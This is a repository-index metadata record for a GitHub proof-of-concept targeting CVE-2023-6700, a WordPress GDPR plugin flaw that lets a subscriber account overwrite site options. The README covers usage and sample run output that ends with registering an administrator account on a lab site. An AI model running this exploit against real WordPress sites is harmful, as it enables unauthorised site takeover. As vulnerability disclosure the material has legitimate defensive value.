{"id":21125697,"url":"https://github.com/randomrobbiebf/cve-2023-6700","last_synced_at":"2026-07-18T05:37:42.617Z","repository":{"id":219922463,"uuid":"750276548","full_name":"RandomRobbieBF/CVE-2023-6700","owner":"RandomRobbieBF","description":"Cookie Information | Free GDPR Consent Solution \u003c= 2.0.22 - Authenticated (Subscriber+) Arbitrary Options Update","archived":false,"fork":false,"pushed_at":"2024-05-21T13:58:37.000Z","size":7,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-10-27T01:08:50.077Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-01-30T10:32:54.000Z","updated_at":"2024-07-11T16:38:26.000Z","dependencies_parsed_at":"2025-01-21T05:50:38.531Z","dependency_job_id":null,"html_url":"https://github.com/RandomRobbieBF/CVE-2023-6700","commit_stats":null,"previous_names":["randomrobbiebf/cve-2023-6700"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2023-6700","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6700","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6700/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6700/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6700/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2023-6700/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6700/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":35606857,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-07-18T02:00:07.223Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:25.409Z","updated_at":"2026-07-18T05:37:42.598Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2023-6700\nCookie Information | Free GDPR Consent Solution \u0026lt;= 2.0.22 - Authenticated (Subscriber+) Arbitrary Options Update\n\n\n### Description:\nCVE-2023-6700 The Cookie Information | Free GDPR Consent Solution plugin for WordPress is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler in versions up to, and including, 2.0.22. This makes it possible for authenticated attackers, with subscriber-level access or higher, to edit arbitrary site options which can be used to create administrator accounts.\n\n```\nSeverity: high\nCVE ID: CVE-2023-6700\nCVSS Score: 8.8\nCVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\nPlugin Slug: wp-gdpr-compliance\nWPScan URL: https://www.wpscan.com/plugin/wp-gdpr-compliance\nReference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/42a4ef37-c842-4925-b06a-3e6423337567?source=api-prod\nDiff URL: https://plugins.trac.wordpress.org/changeset/3028096/wp-gdpr-compliance/trunk?contextall=1\u0026old=2865555\u0026old_path=%2Fwp-gdpr-compliance%2Ftrunk\n```\n\nHow to use\n---\n```\nusage: CVE-2023-6700.py [-h] -u URL [-un USERNAME] [-p PASSWORD] [-f FIX]\n\nCookie Information | Free GDPR Consent Solution \u003c= 2.0.22 - Authenticated (Subscriber+) Arbitrary Options Update\nDescription: CVE-2023-6700 The Cookie Information | Free GDPR Consent Solution plugin for WordPress is vulnerable to\narbitrary option updates due to a missing capability check on its AJAX request handler in versions up to, and including,\n2.0.22. This makes it possible for authenticated attackers, with subscriber-level access or higher, to edit arbitrary site\noptions which can be used to create administrator accounts.\n\noptions:\n  -h, --help            show this help message and exit\n  -u URL, --url URL     Website URL\n  -un USERNAME, --username USERNAME\n                        WordPress username\n  -p PASSWORD, --password PASSWORD\n                        WordPress password\n  -f FIX, --fix FIX     Reset after Exploit\n```\n\nPOC\n---\n```\npython3 CVE-2023-6700.py -u http://wordpress.lan -un user -p useruser1\nThe plugin version is below 2.0.23.\nThe plugin version is 2.0.21\nVulnerability check: http://wordpress.lan\nLogged in successfully.\nOption set successfully: http://wordpress.lan/wp-admin/admin-ajax.php\nOption set successfully: http://wordpress.lan/wp-admin/admin-ajax.php\nYou can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-6700","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2023-6700","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-6700/lists"}